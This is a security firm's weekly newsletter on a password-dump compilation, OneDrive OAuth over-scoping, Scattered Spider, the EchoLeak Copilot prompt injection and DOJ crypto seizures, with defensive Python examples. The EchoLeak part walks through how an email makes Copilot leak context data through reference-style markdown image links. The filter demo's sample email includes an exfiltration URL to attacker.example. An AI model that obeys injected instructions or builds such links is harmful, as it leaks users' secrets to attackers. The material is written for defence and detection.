Cyber Intelligence Weekly (June 22, 2025): Our Take on Three Things You Need to Know
Welcome to our weekly newsletter where we share some of the major developments on the future of cybersecurity that you need to know about. Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!
To receive these and other curated updates to your inbox on a regular basis, please sign up for our email list here: https://echeloncyber.com/ciw-subscribe
Before we get started on this week’s CIW, I’d like to highlight an upcoming webinar on the changes coming down the pipe for HIPAA.
🔍 HIPAA is changing. Is your organization ready?
Join our experts, Josh Fleming, MSITM and Stephen Dyson, Senior Cybersecurity Managers, as they break down the proposed updates and what they mean for healthcare providers, payers, and partners.
Moderated by Cybersecurity Manager Alyson Pisarcik, this session will cover:
⚫ What’s actually changing and who’s impacted
⚫ Real-world strategies to ease implementation
⚫ Third-party oversight and new contingency planning
⚫ Whether you should prepare now… or wait
Reserve your spot: https://lnkd.in/gfA-Gna6

1. Massive Password Dump Sparks Panic—But Here’s What You Really Need to Know
In the latest wave of unsettling cybersecurity headlines, reports have emerged of a jaw-dropping 16 billion passwords circulating online—raising alarm bells for users of major platforms like Apple, Google, Facebook, and more. But before jumping to conclusions, a closer look at the findings reveals this isn’t the result of one catastrophic breach, but rather a compilation of over two dozen previously exposed datasets, many of which had already been leaked over time.
Cybernews, the outlet tracking these exposures, clarified that the leaked data originated from a range of sources: infostealer malware, credential stuffing lists, and rehashed leaks—some old, some new. While the combined total adds up to 16 billion records, the reality is muddier. Many of the exposed passwords are likely duplicates or outdated, and there’s no indication that tech giants like Apple or Google were directly breached. Instead, user credentials associated with those services may have appeared in third-party breaches or malware dumps.
The real concern isn’t a singular event but a growing trend: sensitive login data is increasingly being harvested, repackaged, and shared in ways that expose individuals and organizations alike to serious risk. This reinforces the need for basic but powerful security hygiene—using unique passwords, enabling two-factor authentication, and staying vigilant for signs of account compromise. Security-conscious users can also lean on tools like password managers and breach notification services to stay ahead of potential threats.
For businesses and consumers alike, the takeaway is clear: the threat landscape is shifting from isolated incidents to continuous exposure. The 16 billion-password figure may sound sensational, but it’s just a symptom of a larger, ongoing issue. Proactive defense—not reactive fear—is the best strategy moving forward.
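One of the "breach notification services" mentioned above is worth understanding at the protocol level, because the way it is queried matters. The Pwned Passwords range API uses k-anonymity: only the first five hex characters of a password's SHA-1 hash leave your machine, the service returns every known hash suffix under that prefix, and the comparison finishes locally. The script below is an added example written for this newsletter, not code from Cybernews or from any vendor; the range data it runs against offline is constructed (the counts are invented, only the SHA-1 of "password" is real), and the live lookup function is included but not called.

```python
from __future__ import annotations

import hashlib
from typing import Callable

# Added example, not part of the newsletter: a Pwned Passwords style k-anonymity
# check. Only the first five hex characters of the SHA-1 hash ever leave the
# client; the service answers with every known suffix for that prefix and the
# client finishes the comparison locally.


def hash_prefix_suffix(password: str) -> tuple[str, str]:
    """Return (5-char prefix, 35-char suffix) of the uppercase SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines as returned by a range endpoint."""
    counts: dict[str, int] = {}
    for line in body.splitlines():
        suffix, sep, count = line.strip().partition(":")
        if sep and suffix:
            counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """Number of times the password appears in the corpus, 0 if never seen.

    fetch_range receives only the hash prefix, so the full hash (and of course
    the password itself) never leaves the client.
    """
    prefix, suffix = hash_prefix_suffix(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


# Constructed offline stand-in for the range endpoint: two fake suffixes plus
# the real suffix of SHA-1("password"). The counts are invented for the demo.
FAKE_RANGES = {
    "5BAA6": (
        "0018A45C4D1DEF81644B54AB7F969B88D65:1\n"
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:1234567\n"
        "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF:3\n"
    ),
}


def offline_fetch_range(prefix: str) -> str:
    """Offline substitute for the network call, backed by FAKE_RANGES."""
    return FAKE_RANGES.get(prefix, "")


def live_fetch_range(prefix: str) -> str:
    """Real lookup against the public Pwned Passwords range API (needs network).
    Add-Padding asks the service to pad responses so the response size does not
    reveal how many suffixes the prefix really has."""
    from urllib.request import Request, urlopen

    req = Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"User-Agent": "ciw-example", "Add-Padding": "true"},
    )
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


if __name__ == "__main__":
    for candidate in ("password", "correct horse battery staple"):
        n = breach_count(candidate, offline_fetch_range)
        print(f"{candidate!r}: seen {n} times in the (constructed) corpus")
```

Swap `offline_fetch_range` for `live_fetch_range` to query the real service; either way the password and its full hash stay local, which is the property to insist on before wiring any breach-check into a login or password-change flow.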

OAuth Flaw: Cloud Access via OneDrive File Picker
A critical security flaw in Microsoft’s OneDrive File Picker—used by numerous third-party apps—has been discovered, potentially exposing users to full-drive data access via overly broad OAuth permissions.
What Went Wrong
The OneDrive File Picker requests scopes such as Files.Read.All or Files.ReadWrite.All, which grant an app access to the user’s entire OneDrive even when the user only intends to select a single file. The consent prompt is misleading: it gives users no clear indication that they are granting full-drive access rather than access to one file.
The root cause is the absence of fine-grained OAuth scopes in Microsoft’s implementation. Unlike Google Drive’s drive.file scope or Dropbox's Chooser, OneDrive offers no file-specific permission, so developers must request drive-wide access even for a simple upload.
Widespread Impact
Hundreds of popular apps, including ChatGPT, Slack, Trello, and ClickUp, are affected. Millions of users could unknowingly have granted these applications blanket access to cloud-stored personal and enterprise data.
Token Handling Risks
The situation worsens due to insecure token practices:
- Older File Picker versions (6.0 to 7.2) exposed the access token in the URL fragment or in localStorage.
- Version 8.0, which uses MSAL, stores tokens in plaintext in sessionStorage.
- Requesting refresh tokens extends access well beyond the access token’s lifetime (typically about an hour), increasing exposure if the tokens are stored insecurely.
Why It Matters
Full-drive access via vague consent can result in:
- Data leakage of sensitive documents (e.g., tax forms, medical records).
- Compliance violations in regulated environments.
- Potential exfiltration via malware or targeted threat campaigns.
- Coarse-grained API permissions that grant far deeper access than the user expected.
Mitigation Recommendations
For Users:
- Review and revoke third-party app access via Microsoft account privacy settings.
- Be cautious of any broad data access apps request during upload operations.
For Enterprises:
- Require admin consent for apps that request broad Microsoft Graph scopes (via Entra user consent settings or app consent policies), and use Conditional Access to restrict which client apps can reach company data.
- Monitor Microsoft Graph activity logs, Entra consent audit events, and Cloud Access Security Broker (CASB) tools for suspicious full-drive access.
For Developers:
- Avoid requesting the offline_access scope (which is what issues refresh tokens), and avoid full Files.ReadWrite.All wherever a narrower scope will do.
- Store access tokens securely and minimize their lifespan.
- Consider using shared view-only links instead of OAuth uploads until secure scope changes are available.
Microsoft’s Position
Microsoft has acknowledged the issue and is evaluating improvements, but no patches or timeline have been announced. The company stated that because users must provide consent, the issue does not meet their threshold for immediate servicing; future updates may refine scope alignment and consent clarity.
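A practical way to check your own exposure is to look at what an app actually holds rather than what its consent screen implied. A delegated Microsoft Graph access token carries its granted scopes in the `scp` claim, so decoding the payload of a token you already have (for example one copied from the picker's browser storage) tells you immediately whether it is drive-wide. The script below is an added example written for this newsletter, not Microsoft's or the File Picker's code; it inspects the claims without verifying the signature (it is an audit aid, not a validator), and the token it decodes is constructed and unsigned. The list of "broad" scope names is an assumption chosen to match the scopes named above.

```python
from __future__ import annotations

import base64
import json

# Added example, not Microsoft's or the File Picker's code. Inspects the
# delegated Microsoft Graph access token an app actually received (the "scp"
# claim) and the scope list an app asks MSAL for, and reports anything broader
# than a single-file picker needs.

# Drive- or tenant-wide delegated Graph permissions a file picker should not
# need. Assumed list for the demo; extend it to match your own policy.
BROAD_GRAPH_SCOPES = {
    "Files.Read.All",
    "Files.ReadWrite.All",
    "Sites.Read.All",
    "Sites.ReadWrite.All",
}


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token: str) -> dict:
    """Return the payload of a compact JWS. The signature is NOT verified:
    this is an inspection tool for a token you already hold, not a validator."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(b64url_decode(parts[1]))


def find_broad_scopes(scopes: list[str]) -> list[str]:
    """Scopes that grant drive- or tenant-wide access rather than per-item access."""
    return sorted(s for s in scopes if s in BROAD_GRAPH_SCOPES or s.endswith(".All"))


def audit_access_token(token: str) -> dict:
    """Summarise audience, granted scopes, over-broad scopes and lifetime."""
    claims = decode_jwt_claims(token)
    scopes = claims.get("scp", "").split()  # delegated scopes are space separated
    lifetime = int(claims.get("exp", 0)) - int(claims.get("iat", 0))
    return {
        "audience": claims.get("aud"),
        "scopes": scopes,
        "broad": find_broad_scopes(scopes),
        "lifetime_minutes": lifetime // 60,
    }


def audit_requested_scopes(scopes: list[str]) -> dict:
    """Check the scope list an app passes to MSAL before any token is issued."""
    return {
        "broad": find_broad_scopes(scopes),
        # offline_access is the scope that makes Entra hand back a refresh token.
        "requests_refresh_token": "offline_access" in scopes,
    }


def make_demo_token(claims: dict) -> str:
    """Constructed, unsigned token purely for demonstration."""
    def enc(obj: dict) -> str:
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


# Constructed claims resembling what a picker-integrated app might hold.
DEMO_PICKER_TOKEN = make_demo_token({
    "aud": "https://graph.microsoft.com",
    "scp": "Files.ReadWrite.All User.Read",
    "iat": 1700000000,
    "exp": 1700003600,
})

if __name__ == "__main__":
    print(audit_access_token(DEMO_PICKER_TOKEN))
    print(audit_requested_scopes(["Files.Read", "offline_access"]))
```

If `broad` is non-empty for a picker integration, that app can read (or write) the whole drive regardless of which file the user chose; if `requests_refresh_token` is true, that access survives the access token's expiry for as long as the refresh token is valid and stored.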

2. Scattered Spider Strikes Again—Insurance Sector Now in the Crosshairs
The cybercriminal group known as Scattered Spider is back in the headlines, shifting its focus from high-end retail to the U.S. insurance industry. According to analysts at Google’s Threat Intelligence Group, multiple recent intrusions targeting insurers bear the unmistakable characteristics of this sophisticated hacking collective. The group, infamous for its tailored social engineering attacks, appears to be ramping up a campaign against companies that manage large volumes of sensitive financial and health data.
Recent victims appear to include Erie Insurance and Philadelphia Insurance Companies, both of which reported operational disruptions following cyber incidents in early June. While neither firm directly attributed the attacks to Scattered Spider, cybersecurity experts believe the timing and methods involved strongly align with the group's typical playbook—namely, impersonating IT staff to manipulate help desks and exploit remote access channels. A prominent Swedish insurer also reportedly suffered a similar fate last week.
Scattered Spider, also tracked under aliases like UNC3944 and 0ktapus, has a reputation for targeting one industry at a time. The group was previously behind a wave of retail breaches affecting names like Harrods and Victoria’s Secret and, earlier, the 2023 intrusion at MGM Resorts. It uses a mix of social engineering, SIM swapping, and MFA fatigue techniques to gain access before deploying ransomware strains such as DragonForce or Qilin in later stages of compromise.
As insurance firms reckon with rising cyber risk, defenders must double down on identity protections, monitor for privilege abuse, and bolster verification protocols for help desk operations. With the group’s pivot into the insurance vertical, the message is clear: no sector is off limits when it comes to highly organized, psychologically savvy adversaries.
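The help-desk playbook described above leaves a recognisable trail in identity logs: a password reset performed by a help-desk account, an MFA method registered shortly afterwards, and then a sign-in from somewhere the user has never signed in from. The correlation below is an added example written for this newsletter, not a detection from Google's Threat Intelligence Group or any vendor; the activity names are modelled on Entra ID audit and sign-in log entries, the time window and the "new country" heuristic are assumptions, and every record is constructed (IPs are from RFC 5737 documentation ranges).

```python
from __future__ import annotations

from datetime import datetime, timedelta

# Added example, not from the newsletter or from any vendor: a correlation over
# identity audit events for the help-desk impersonation chain. Activity names
# are modelled on Entra ID audit/sign-in logs; the records are constructed.

HELPDESK_RESET = "Reset user password"
MFA_CHANGES = {"Admin registered security info", "User registered security info"}
SIGN_IN = "Sign-in"
WINDOW = timedelta(minutes=60)  # assumed window between reset and follow-on activity


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def known_countries(events: list[dict], user: str, before: datetime) -> set[str]:
    """Countries the user signed in from prior to the reset (the baseline)."""
    return {
        e["country"]
        for e in events
        if e["activity"] == SIGN_IN and e["target"] == user and parse_ts(e["time"]) < before
    }


def detect_helpdesk_takeover(events: list[dict], window: timedelta = WINDOW) -> list[dict]:
    """Alert when a help-desk password reset is followed within `window` by
    both an MFA method change and a sign-in from a country outside the user's
    baseline. A user with no baseline makes every country "new"; that is
    deliberate, since accounts with no history deserve the look."""
    alerts = []
    for reset in events:
        if reset["activity"] != HELPDESK_RESET:
            continue
        user, t0 = reset["target"], parse_ts(reset["time"])
        baseline = known_countries(events, user, t0)
        mfa_change = new_geo = None
        for e in events:
            t = parse_ts(e["time"])
            if e["target"] != user or not (t0 <= t <= t0 + window):
                continue
            if e["activity"] in MFA_CHANGES:
                mfa_change = e
            elif e["activity"] == SIGN_IN and e["country"] not in baseline:
                new_geo = e
        if mfa_change and new_geo:
            alerts.append({
                "user": user,
                "helpdesk_actor": reset["actor"],
                "reset_at": reset["time"],
                "mfa_change_at": mfa_change["time"],
                "signin_from": new_geo["country"],
                "ip": new_geo["ip"],
            })
    return alerts


def ev(time: str, activity: str, actor: str, target: str, country: str | None = None, ip: str | None = None) -> dict:
    return {"time": time, "activity": activity, "actor": actor, "target": target, "country": country, "ip": ip}


# Constructed sample: alice shows the full chain; bob gets a legitimate reset
# and MFA re-enrolment but signs in from his usual country; carol signs in
# from a new country but had no reset at all.
SAMPLE_EVENTS = [
    ev("2025-06-09T15:00:00Z", SIGN_IN, "alice@contoso.example", "alice@contoso.example", "US", "192.0.2.10"),
    ev("2025-06-09T16:00:00Z", SIGN_IN, "bob@contoso.example", "bob@contoso.example", "US", "192.0.2.11"),
    ev("2025-06-10T09:00:00Z", HELPDESK_RESET, "helpdesk2@contoso.example", "bob@contoso.example"),
    ev("2025-06-10T09:04:00Z", "User registered security info", "bob@contoso.example", "bob@contoso.example"),
    ev("2025-06-10T09:20:00Z", SIGN_IN, "bob@contoso.example", "bob@contoso.example", "US", "192.0.2.11"),
    ev("2025-06-10T11:00:00Z", SIGN_IN, "carol@contoso.example", "carol@contoso.example", "DE", "198.51.100.7"),
    ev("2025-06-10T13:02:00Z", HELPDESK_RESET, "helpdesk1@contoso.example", "alice@contoso.example"),
    ev("2025-06-10T13:05:00Z", "Admin registered security info", "helpdesk1@contoso.example", "alice@contoso.example"),
    ev("2025-06-10T13:11:00Z", SIGN_IN, "alice@contoso.example", "alice@contoso.example", "RO", "203.0.113.9"),
]

if __name__ == "__main__":
    for alert in detect_helpdesk_takeover(SAMPLE_EVENTS):
        print(alert)
```

In production the baseline would come from weeks of sign-in history rather than a single prior event, and the same chain is worth alerting on when the "help desk" actor is itself a freshly created or rarely used admin account.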
Critical Zero‑Click Copilot Bug “EchoLeak”: Exposing Sensitive M365 Data
Aim Security’s research team (Aim Labs) recently disclosed a serious zero-click vulnerability in Microsoft 365 Copilot, dubbed EchoLeak (CVE-2025-32711), which carried a CVSS score of 9.3.
What It Is
EchoLeak allows an attacker to carry out a cross-prompt injection attack through a carefully crafted email. The email is phrased as if it were written for the human recipient rather than for Copilot, which lets it slip past Microsoft’s prompt-injection classifiers, and it carries specially formatted reference-style markdown links. Copilot indexes received email so it can pull messages in as context for summaries and answers; when it retrieves the malicious message, it can follow the embedded instructions and place sensitive data from the user’s context, such as API keys, into the link’s query parameters, sending it to an attacker-controlled domain. Importantly, this happens without any user click or awareness, because the attack rides on Copilot’s automated processing.
Proof-of-Concept
Researchers demonstrated the exploit by getting Copilot to disclose sensitive content, such as API keys previously written in the user’s context. They also achieved an image-based leak by embedding markdown image syntax, which the client fetches automatically without a click; Microsoft’s Content Security Policy restricts which hosts images may be loaded from, but the researchers bypassed it by chaining through SharePoint and Teams invite flows, whose domains are permitted.
Why it Matters
- Stealthy: No user interaction required.
- Bypass effectiveness: Attack evades typical XPIA (cross‑prompt injection attack) filters.
- Context trust abuse: Leverages Copilot’s propensity to process content automatically and trust its own metadata interpretation.
Microsoft’s Response
- Released a prompt injection fix in M365 Copilot, deploying it quickly with no end-user intervention needed.
- Emphasized additional “defense-in-depth” strategies to reinforce mitigation.
- Confirmed no known customer incidents to date, and attributed the fix to responsible disclosure.
Broader Implications
AIM’s CTO Adir Gruss warns that while implementation varies, similar vulnerabilities could exist across other AI agents. The team has found analogous flaws in additional platforms already.
Key Takeaways for Security Teams:
- Prompt-injection threats now rival phishing in severity, and they require no user interaction at all.
- Email vectors remain powerful attack surfaces for AI-based tools.
- Automated content processing (tags, previews, summaries) must be treated with the same scrutiny as user actions.
- AI-specific exploit mitigation such as advanced XPIA filters and heuristic defense are essential.
EchoLeak starkly illustrates how AI-powered workflows can amplify stealth threats—requiring security teams to rethink traditional assumptions and control strategies in Copilot-integrated environments.
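The markdown detail is the part defenders can act on today. Reference-style syntax puts the destination in a `[label]: url` definition elsewhere in the message, so a filter that only recognises inline `[text](url)` never sees the exfiltration URL, and an image reference is fetched by the client without anyone clicking. The script below is an added example written for this newsletter, not Aim Labs’ or Microsoft’s code; it shows the blind spot of an inline-only check and a stricter pass that resolves references before deciding what to strip or flag. The sample email, the allow-list and the policy (strip every image in untrusted content, flag links to unknown hosts) are constructed assumptions for the demo.

```python
from __future__ import annotations

import re
from urllib.parse import urlparse

# Added example, not Aim Labs' or Microsoft's code: how reference-style markdown
# slips past a link filter that only understands inline syntax, and a stricter
# pass that resolves references before deciding what to strip or flag.

# [label]: <url> definitions, usually parked at the bottom of the message.
DEF_RE = re.compile(r"^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?([^\s>]+)>?", re.MULTILINE)
# Inline [text](url) and ![alt](url).
INLINE_RE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)")
# Full [text][label], collapsed [text][] and shortcut [text] references.
REF_RE = re.compile(r"(!?)\[([^\]]*)\](?:\[([^\]]*)\])?")


def naive_inline_only(md: str) -> list[dict]:
    """What a filter that only knows inline syntax sees."""
    return [{"kind": "image" if m.group(1) else "link", "url": m.group(3)}
            for m in INLINE_RE.finditer(md)]


def extract_links(md: str) -> list[dict]:
    """Inline links plus reference-style links resolved against their definitions."""
    defs = {m.group(1).strip().lower(): m.group(2) for m in DEF_RE.finditer(md)}
    body = DEF_RE.sub("", md)
    found: list[dict] = []

    def take_inline(m: re.Match) -> str:
        found.append({"kind": "image" if m.group(1) else "link",
                      "text": m.group(2), "url": m.group(3), "style": "inline"})
        return " "  # blank it so REF_RE does not re-match the [text] part

    body = INLINE_RE.sub(take_inline, body)
    for m in REF_RE.finditer(body):
        bang, text, label = m.group(1), m.group(2), m.group(3)
        key = (label or text).strip().lower()  # collapsed/shortcut forms use the text as label
        url = defs.get(key)
        if url is None:
            continue  # plain [bracketed] text, not a link
        found.append({"kind": "image" if bang else "link",
                      "text": text, "url": url, "style": "reference"})
    return found


def review(md: str, allowed_hosts: set[str]) -> dict[str, list[str]]:
    """Images are fetched by the client without a click, so they are stripped
    outright: a host allow-list is not enough once a trusted domain can serve
    as a relay. Links need a click, so only those to unknown hosts are flagged."""
    strip, flag = [], []
    for item in extract_links(md):
        host = urlparse(item["url"]).hostname or ""
        if item["kind"] == "image":
            strip.append(item["url"])
        elif host not in allowed_hosts:
            flag.append(item["url"])
    return {"strip": strip, "flag": flag}


# Constructed message. The ctx parameter marks where an injected instruction
# would tell the assistant to place data taken from the user's context.
SAMPLE_EMAIL = """Hi team, notes from today's sync are below.

Keep this summary handy: ![summary][img]
Our logo: ![logo](https://contoso.sharepoint.com/sites/eng/logo.png)
Reference doc: [the guide][doc]
Old wiki: [archive](https://wiki.example.net/page)

[img]: https://attacker.example/collect?ctx=SECRET_GOES_HERE
[doc]: https://contoso.sharepoint.com/sites/eng/guide.docx
"""
ALLOWED_HOSTS = {"contoso.sharepoint.com"}  # assumed tenant allow-list

if __name__ == "__main__":
    print("inline-only filter sees:", [i["url"] for i in naive_inline_only(SAMPLE_EMAIL)])
    print("full review:", review(SAMPLE_EMAIL, ALLOWED_HOSTS))
```

Run it and the inline-only filter reports the logo and the wiki link but never the `attacker.example` image, which is exactly the gap the reference-style trick exploits; the full review strips both images (the allow-listed one too, since a permitted domain can be chained into a relay as the CSP bypass showed) and flags the off-tenant link for a human to look at.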

3. Feds Move to Reclaim $225M in Crypto Lost to Global Romance and Investment Scams
The U.S. Department of Justice has launched a sweeping legal effort to recover over $225 million in cryptocurrency that was siphoned away from hundreds of victims in a wave of online scams. These sophisticated operations, often disguised as crypto investment opportunities or online relationships, were traced back to organized groups operating out of the Philippines and using identification tied to Vietnamese nationals.
According to a recent civil forfeiture complaint, the scammers used a web of more than 100 crypto wallets and thousands of transactions to obfuscate the trail of stolen funds. With the help of blockchain analytics, investigators from the FBI and U.S. Secret Service linked the activity to victims across the U.S., including in states like Texas, Arizona, and California. One of the most high-profile victims was Shan Hanes, a former Kansas bank CEO now serving a 24-year sentence for embezzling tens of millions—funds he later lost to one of these scams.
The crypto exchange OKX first raised red flags back in 2022, leading law enforcement to a broader scheme involving a network of “scam compounds.” Many of the accounts were registered using similar email formats, accessed via Philippine-based IPs, and verified with photos that appeared to be taken in a single location. Authorities believe these operations lured job applicants with Mandarin-speaking skills to the Philippines under false pretenses, recruiting them into criminal enterprises.
This case highlights a growing trend: law enforcement agencies are becoming more effective at untangling blockchain obfuscation and holding international fraud rings accountable. While many victims may never fully recoup their losses, the DOJ's action marks a significant step forward in turning the tide against cryptocurrency-enabled confidence scams.
Thanks for reading!
About us: Echelon is a full-service cybersecurity consultancy that offers holistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about